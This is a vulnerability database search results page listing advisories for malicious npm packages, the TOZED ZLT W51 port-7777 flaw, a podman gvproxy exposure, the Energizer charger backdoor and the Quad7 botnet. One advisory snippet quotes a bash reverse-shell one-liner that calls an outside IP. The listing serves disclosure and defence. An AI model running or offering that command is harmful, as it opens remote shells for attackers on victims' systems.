CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

41 matches found

OSSF Malicious Packages•added 2026/06/14 1:39 p.m.•8 views

Malicious code in npx-whoami-demo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174 The package's only code file index.js, also registered as the package's bin entry unconditionally executes require'childprocess'.execSync"bash -c...

5.5AI score

Exploits0References1

OSV•added 2026/05/25 3:45 a.m.•18 views

MAL-2026-4679 Malicious code in system-user-identifier-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8 index.js line 13 executes bash -c "bash -i & /dev/tcp/101.43.232.7/7777 0&1" via childprocess.exec, opening an interactive reverse shell to the...

5.9AI score

Exploits0References7

EUVD•added 2025/10/07 12:30 a.m.•2 views

EUVD-2010-5247

Malware in sbrugna...

7.5CVSS6.4AI score0.03081EPSS

Exploits0References3

EUVD•added 2025/10/03 8:7 p.m.•5 views

EUVD-2025-28384

Malicious code in bioql PyPI...

7.5CVSS7.5AI score0.00378EPSS

Exploits0References5

Tenable Nessus•added 2025/08/20 12:0 a.m.•4 views

Linux Distros Unpatched Vulnerability : CVE-2021-4024

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - A flaw was found in podman. The podman machine function used to create and manage Podman virtual machine containing a Podman process spawns a gvproxy process on...

6.5CVSS7AI score0.01057EPSS

Exploits1References2

NVD•added 2025/05/23 12:15 p.m.•11 views

CVE-2025-5105

A vulnerability was found in TOZED ZLT W51 up to 1.4.2 and classified as critical. Affected by this issue is some unknown functionality of the component Service Port 7777. The manipulation leads to improper clearing of heap memory before release. The attack may be launched remotely. The exploit h...

7.5CVSS0.00378EPSS

Exploits0References5

Cvelist•added 2025/05/23 12:0 p.m.•15 views

CVE-2025-5105 TOZED ZLT W51 Service Port 7777 heap inspection

7.5CVSS0.00378EPSS

Exploits0References5

CVE•added 2025/05/23 12:0 p.m.•59 views

CVE-2025-5105

The CVE-2025-5105 entry concerns TOZED ZLT W51 firmware (versions up to 1.4.2). The issue affects an unknown functionality of the component exposed on Service Port 7777, where improper clearing of heap memory before release is reported as the root cause. Impact is described as remote attack possi...

7.5CVSS7.2AI score0.00378EPSS

Exploits0References5

CNNVD•added 2025/05/23 12:0 a.m.•3 views

TOZED ZLT W51 安全漏洞

TOZED ZLT W51 is a router from China Tongze Kangwei TOZED. A security vulnerability exists in TOZED ZLT W51 version 1.4.2 and earlier, which stems from improper cleanup of the heap memory of the service port 7777 component before freeing it...

7.5CVSS7.4AI score0.00378EPSS

Exploits0References5

Positive Technologies•added 2025/05/23 12:0 a.m.•3 views

PT-2025-22656 · Unknown · Tozed Zlt W51

Name of the Vulnerable Software and Affected Versions: TOZED ZLT W51 versions up to 1.4.2 Description: A critical issue affects some unknown functionality of the component Service Port 7777, leading to improper clearing of heap memory before release. This can be exploited remotely. The exploit ha...

7.5CVSS7.1AI score0.00378EPSS

Exploits0References10

RedhatCVE•added 2025/05/22 12:50 a.m.•7 views

CVE-2010-0103

UsbCharger.dll in the Energizer DUO USB battery charger software contains a backdoor that is implemented through the Arucer.dll file in the %WINDIR%\system32 directory, which allows remote attackers to download arbitrary programs onto a Windows PC, and execute these programs, via a request to TCP...

9.3CVSS7.1AI score0.27541EPSS

Exploits6References1

RedHat Linux•added 2024/11/26 6:52 a.m.•0 views

podman: podman machine spawns gvproxy with port bound to all IPs

A flaw was found in podman. The podman machine function used to create and manage Podman virtual machine containing a Podman process spawns a gvproxy process on the host system. The gvproxy API is accessible on port 7777 on all IP addresses on the host. If that port is open on the host's firewall...

6.5CVSS7.1AI score0.01057EPSS

Exploits1References4

The Hacker News•added 2024/09/11 4:20 p.m.•18 views

Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances

The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws. Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to ...

7.7AI score

Exploits0

BDU FSTEC•added 2023/07/13 12:0 a.m.•5 views

The vulnerability of the virtualization management tool used in the Podman-machine software for managing and launching OCI containers allows a perpetrator to gain unauthorized access to protected information.

The vulnerability of the Podman-machine management tool, a software solution for managing and starting OCI containers, relates to insufficient protection of sensitive data due to the redirection of host ports to virtual machine ports during the process of mapping ports using gvproxy. Exploiting...

6.5CVSS6.5AI score0.02067EPSS

Exploits1References10Affected Software4

Packet Storm•added 2022/04/07 12:0 a.m.•257 views

Backdoor.Win32.Tiny.a Remote Command Execution

Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/9fa664bc52e1aa46a09ac51aaa6c7384.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Tiny.a Vulnerability: Unauthenticated Remote Command Execution Description: The malwa...

7.4AI score

Exploits0